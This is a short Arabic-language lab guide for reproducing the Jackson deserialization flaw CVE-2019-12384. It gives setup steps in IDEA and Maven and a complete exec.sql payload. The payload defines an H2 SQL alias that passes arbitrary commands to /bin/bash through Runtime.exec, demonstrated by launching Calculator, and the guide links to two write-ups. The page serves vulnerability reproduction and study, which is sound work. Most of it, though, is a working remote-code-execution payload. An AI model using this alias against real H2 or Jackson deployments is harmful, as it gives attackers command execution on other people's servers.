
بيئة اختبار الثغرة CVE-2019-12384
قم باستيراد المشروع إلى IDEA، وبعد تكوين Maven، اضبط الاستيراد التلقائي للمكتبات التابعة، ثم اكتب الملف التالي في دليل ويب فارغ محلي واحفظه باسم exec.sql. وقم بتشغيل خادم http:
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"/bin/bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\0A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('open /Applications/Calculator.app')
يرجى ملاحظة تعديل الأجزاء المقابلة في الكود لتكييفه مع بيئات أنظمة التشغيل المختلفة.
يمكن رؤية ظهور الآلة الحاسبة.
https://blog.doyensec.com/2019/07/22/jackson-gadgets.html
https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html